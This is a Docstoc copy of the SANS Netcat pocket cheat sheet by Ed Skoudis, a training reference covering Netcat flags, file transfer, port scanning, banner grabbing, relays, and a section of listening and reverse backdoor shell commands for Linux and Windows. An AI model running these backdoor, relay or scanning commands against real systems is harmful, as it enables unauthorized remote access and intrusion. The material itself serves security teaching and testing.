Docstoc

Metcat cheat sheet

Document Sample
Metcat cheat sheet Powered By Docstoc
					            Netcat Relays on Windows                                  Netcat Command Flags
                                                                                                                                                     Netcat
To start, enter a temporary directory where we will     $ nc [options] [TargetIPaddr] [port(s)]
                                                                                                                                                   Cheat Sheet
create .bat files:                                                                                                                                     By Ed Skoudis
C:\> cd c:\temp                                         The [TargetIPaddr] is simply the other side’s IP
                                                                                                                                                  POCKET REFERENCE GUIDE
                                                        address or domain name. It is required in client mode
Listener-to-Client Relay:                               of course (because we have to tell the client where to                                          http://www.sans.org
C:\> echo nc [TargetIPaddr] [port] >                    connect), and is optional in listen mode.
relay.bat
C:\> nc –l –p [LocalPort] –e relay.bat                     -l: Listen mode (default is client mode)                                        Purpose
                                                           -L: Listen harder (supported only on Windows                   This cheat sheet provides various tips for
Create a relay that sends packets from the local port           version of Netcat). This option makes Netcat a               using Netcat on both Linux and Unix,
[LocalPort] to a Netcat Client connected to                     persistent listener which starts listening again          specifically tailored to the SANS 504, 517,
[TargetIPaddr] on port [port]                                   after a client disconnects                               and 560 courses. All syntax is designed for
                                                           -u: UDP mode (default is TCP)                                   the original Netcat versions, released by
                                                           -p: Local port (In listen mode, this is port listened           Hobbit and Weld Pond. The syntax here
Listener-to-Listener Relay:                                     on. In client mode, this is source port for all          can be adapted for other Netcats, including
C:\> echo nc –l –p [LocalPort_2] >                              packets sent)                                                    ncat, gnu Netcat, and others.
relay.bat                                                  -e: Program to execute after connection occurs,
C:\> nc –l –p [LocalPort_1] –e
                                                                connecting STDIN and STDOUT to the
relay.bat                                                                                                                               Fundamentals
                                                                program
                                                           -n: Don’t perform DNS lookups on names of
Create a relay that will send packets from any                                                                      Fundamental Netcat Client:
                                                                machines on the other side
connection on [LocalPort_1] to any connection                                                                       $ nc [TargetIPaddr] [port]
                                                           -z: Zero-I/O mode (Don’t send any data, just emit
on [LocalPort_2]                                                a packet without payload)
                                                                                                                    Connect to an arbitrary port [port] at IP Address
                                                           -wN: Timeout for connects, waits for N seconds           [TargetIPaddr]
                                                                after closure of STDIN. A Netcat client or
Client-to-Client Relay:
                                                                listener with this option will wait for N seconds
C:\> echo nc [NextHopIPaddr] [port2] >                                                                              Fundamental Netcat Listener:
relay.bat                                                       to make a connection. If the connection             $ nc –l -p [LocalPort]
C:\> nc [PreviousHopIPaddr] [port] –e                           doesn’t happen in that time, Netcat stops
relay.bat                                                       running.
                                                                                                                    Create a Netcat listener on arbitrary local port
                                                           -v: Be verbose, printing out messages on                 [LocalPort]
Create a relay that will send packets from the                  Standard Error, such as when a connection
connection to [PreviousHopIPaddr] on port                       occurs                                              Both the client and listener take input from STDIN
[port] to a Netcat Client connected to                     -vv: Be very verbose, printing even more details         and send data received from the network to STDOUT
                                                                on Standard Error
[NextHopIPaddr] on port [port2]
                   File Transfer                                   TCP Banner Grabber                                     Netcat Relays on Linux

                                                    Grab the banner of any TCP service running on an IP      To start, create a FIFO (named pipe) called
Push a file from client to listener:
$ nc –l -p [LocalPort] > [outfile]                  Address from Linux:                                      backpipe:
                                                    $ echo "" | nc –v –n –w1 [TargetIPaddr]                  $ cd /tmp
                                                    [start_port]-[end_port]                                  $ mknod backpipe p
Listen on [LocalPort], store results in [outfile]

$ nc –w3 [TargetIPaddr] [port] <                    Attempt to connect to each port in a range from
[infile]                                            [end_port] to [start_port] on IP Address                 Listener-to-Client Relay:
                                                                                                             $ nc –l –p [LocalPort] 0<backpipe | nc
                                                    [TargetIPaddr] running verbosely (-v), not               [TargetIPaddr] [port] | tee backpipe
Push [infile] to [TargetIPaddr] on [port]           resolving names (-n), and waiting no more than 1
                                                    second for a connection to occur (-w1). Then send a      Create a relay that sends packets from the local port
Pull file from listener back to client:             blank string to the open port and print out any          [LocalPort] to a Netcat client connected to
$ nc –l -p [LocalPort] < [infile]                   banner received in response
                                                                                                             [TargetIPaddr] on port [port]
Listen on [LocalPort], prep to push [infile]        Add –r to randomize destination ports within the
                                                    range                                                    Listener-to-Listener Relay:
$ nc –w3 [TargetIPaddr] [port] >
                                                                                                             $ nc –l –p [LocalPort_1] 0<backpipe |
[outfile]                                           Add –p [port] to specify a source port for the           nc –l –p [LocalPort_2] | tee backpipe
                                                    scan
Connect to [TargetIPaddr] on [port] and
                                                                  Backdoor Shells                            Create a relay that sends packets from any
retrieve [outfile]                                                                                           connection on [LocalPort_1] to any connection
                                                    Listening backdoor shell on Linux:                       on [LocalPort_2]
                TCP Port Scanner                    $ nc –l –p [LocalPort] –e /bin/bash
                                                    Listening backdoor shell on Windows:
Port scan an IP Address:                            C:\> nc –l –p [LocalPort] –e cmd.exe
$ nc –v –n –z –w1 [TargetIPaddr]                                                                             Client-to-Client Relay:
[start_port]-[end_port]                                                                                      $ nc [PreviousHopIPaddr] [port]
                                                    Create a shell on local port [LocalPort] that can        0<backpipe | nc [NextHopIPaddr]
                                                    then be accessed using a fundamental Netcat client       [port2] | tee backpipe
Attempt to connect to each port in a range from
[end_port] to [start_port] on IP Address
                                                    Reverse backdoor shell on Linux:                         Create a relay that sends packets from the
[TargetIPaddr] running verbosely (-v on Linux, -    $ nc [YourIPaddr] [port] –e /bin/bash                    connection to [PreviousHopIPaddr] on port
vv on Windows), not resolving names (-n), without   Reverse backdoor shell on Windows:                       [port] to a Netcat client connected to
sending any data (-z), and waiting no more than 1   C:\> nc [YourIPaddr] [port] –e cmd.exe                   [NextHopIPaddr] on port [port2]
second for a connection to occur (-w1)
                                                    Create a reverse shell that will attempt to connect to
The randomize ports (-r) switch can be used to      [YourIPaddr] on local port [port]. This shell
choose port numbers randomly in the range           can then be captured using a fundamental nc listener

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:51
posted:10/27/2009
language:English
pages:2